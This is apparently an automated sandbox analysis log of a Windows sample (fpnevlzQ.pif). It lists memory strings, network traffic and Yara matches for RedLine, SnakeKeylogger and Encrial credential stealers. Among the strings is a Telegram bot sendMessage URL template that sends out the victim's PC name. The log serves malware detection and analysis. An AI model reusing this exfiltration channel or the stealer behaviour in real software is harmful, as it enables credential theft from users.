https://api.telegram.org/bot
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FB14000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FB14000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745481%0D%0ADate%20a
Source: fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F0E3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F32A000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020CFA000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020AB3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000202A3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000204EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F0E3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F32A000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020CFA000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020AB3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000202A3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000204EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F0E3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F32A000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020CFA000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020AB3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000202A3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000204EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FB37000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F0E3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F32A000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020CFA000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020AB3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000202A3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000204EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F0E3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F32A000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020CFA000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020AB3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000202A3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000204EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F0E3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F32A000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020CFA000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020AB3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000202A3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000204EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FA7E000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FB14000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FAED000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F26E000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F304000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F2DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: fpnevlzQ.pif, 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E0AD000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FA7E000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F26E000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F2DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FAA8000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FB14000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FAED000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F298000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F304000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F2DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.1894
Source: fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F0E3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F32A000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020CFA000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020AB3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000202A3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000204EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F0E3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 00000007.00000002.3390390312.000000002F32A000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020CFA000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3387393338.0000000020AB3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000202A3000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3385919948.00000000204EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FB37000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49924 version: TLS 1.2

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Window created: window name: CLIPBRDWNDCLASS

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_341F8750 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,	7_2_341F8750
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_341F8740 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,	7_2_341F8740
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 10_2_25B98148 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,	10_2_25B98148

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.fpnevlzQ.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.438038.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.fpnevlzQ.pif.4dc8c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.1.fpnevlzQ.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.fpnevlzQ.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.Qzlvenpf.PIF.21108348.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fpnevlzQ.pif.1f830000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fpnevlzQ.pif.1f830000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fpnevlzQ.pif.1f830000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fpnevlzQ.pif.1f5411e6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.3.fpnevlzQ.pif.2c39f308.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fpnevlzQ.pif.1f5411e6.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.3.fpnevlzQ.pif.2c39f308.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fpnevlzQ.pif.1f5411e6.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.3.fpnevlzQ.pif.2c39f308.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.1.fpnevlzQ.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.21740000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.1.fpnevlzQ.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.21740000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.fpnevlzQ.pif.21740000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.1.fpnevlzQ.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.fpnevlzQ.pif.1f830000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fpnevlzQ.pif.1f830000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fpnevlzQ.pif.1f830000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.1.fpnevlzQ.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.1.fpnevlzQ.pif.438038.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.1.fpnevlzQ.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.3.fpnevlzQ.pif.1d29f158.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.3.fpnevlzQ.pif.1d29f158.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.3.fpnevlzQ.pif.1d29f158.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.1.fpnevlzQ.pif.4dc8c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.21740000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.fpnevlzQ.pif.21740000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.fpnevlzQ.pif.21740000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.1.fpnevlzQ.pif.438038.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.Qzlvenpf.PIF.211acbd8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.fpnevlzQ.pif.438038.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.1.fpnevlzQ.pif.4dc8c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PWSW6GK3ZC.exe.213cb7a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.30cc0000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.fpnevlzQ.pif.30cc0000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.fpnevlzQ.pif.30cc0000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.2de611e6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.fpnevlzQ.pif.2de611e6.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.fpnevlzQ.pif.2de611e6.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.1eeb02c6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.fpnevlzQ.pif.1eeb02c6.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.fpnevlzQ.pif.1eeb02c6.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fpnevlzQ.pif.1f5402c6.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fpnevlzQ.pif.1f5402c6.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fpnevlzQ.pif.1f5402c6.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.1.fpnevlzQ.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.fpnevlzQ.pif.4dc8c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.fpnevlzQ.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.fpnevlzQ.pif.30630000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.fpnevlzQ.pif.30630000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
